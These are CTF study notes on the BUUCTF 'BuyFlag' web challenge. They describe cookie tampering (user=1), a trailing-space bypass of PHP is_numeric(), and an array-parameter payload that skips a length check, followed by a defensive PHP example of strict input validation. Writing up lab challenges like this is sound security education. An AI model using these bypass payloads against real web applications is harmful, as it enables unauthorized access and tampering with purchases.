"Juliet with a gun."

Root's CTF study notes.

BUUCTF/极客大挑战2019 (Geek Challenge 2019) - WEB BuyFlag

View the page source and go to the payflag page, where there is a hint:

Flag need your 100000000 money

attention

If you want to buy the FLAG:
You must be a student from CUIT!!!
You must be answer the correct password!!!

I looked it up and CUIT means Argentina, so I changed Accept-Language to es-ar, though later testing showed it had no effect..
Change user=0 in the Cookie to user=1.

At the very bottom there is a comment:

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}
-->

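Bypassing is_numeric(): just add a space after the 404 in password when sending the parameter. On PHP versions before 8, the trailing space makes is_numeric() return false, while the loose == comparison still converts the string to the number 404.
Then sending money=100000000 returns the message "Nember lenth is too long", so bypass it directly with an array.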

payload:
password=404 &money[]=100000000
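
The check from the comment above next to a strict form that rejects both inputs, as an added example (not the challenge's server code beyond the quoted check). strict_check() and parse_money() are hypothetical helpers, and the 9-digit limit and the input list are constructed for illustration.

```php
<?php
declare(strict_types=1);

// The check quoted in the page's HTML comment, wrapped in a function.
function page_check($password): string
{
    if (is_numeric($password)) {
        return "rejected";
    } elseif ($password == 404) {    // loose comparison: the string is converted to a number
        return "accepted";
    }
    return "wrong";
}

// Hardened form (hypothetical): accept only a string and compare it exactly.
function strict_check($password, string $expected): string
{
    if (!is_string($password)) {     // password[]=... arrives as an array and stops here
        return "rejected";
    }
    return hash_equals($expected, $password) ? "accepted" : "wrong";
}

// Hypothetical validator for the money field: canonical decimal string only.
// The 9-digit limit is an assumption, not the challenge's real limit.
function parse_money($money, int $maxDigits = 9): ?int
{
    if (!is_string($money) || !ctype_digit($money) || strlen($money) > $maxDigits) {
        return null;                 // arrays, signs, spaces, exponents, over-long values
    }
    return (int) $money;
}

// Constructed inputs mirroring the requests described above.
// Results of page_check() differ by PHP version: PHP 8 changed how
// numeric strings with trailing whitespace and trailing text are handled.
$inputs = ["404", "404 ", "404abc", ["404"]];
foreach ($inputs as $in) {
    printf("%-12s page=%-9s strict=%s\n",
        json_encode($in), page_check($in), strict_check($in, "404"));
}
var_dump(parse_money("100000000"), parse_money(["100000000"]), parse_money("1e9"));
```

Running it under both PHP 7 and PHP 8 shows which of the loose-comparison results depend on the interpreter version, while strict_check() and parse_money() give the same answers on both.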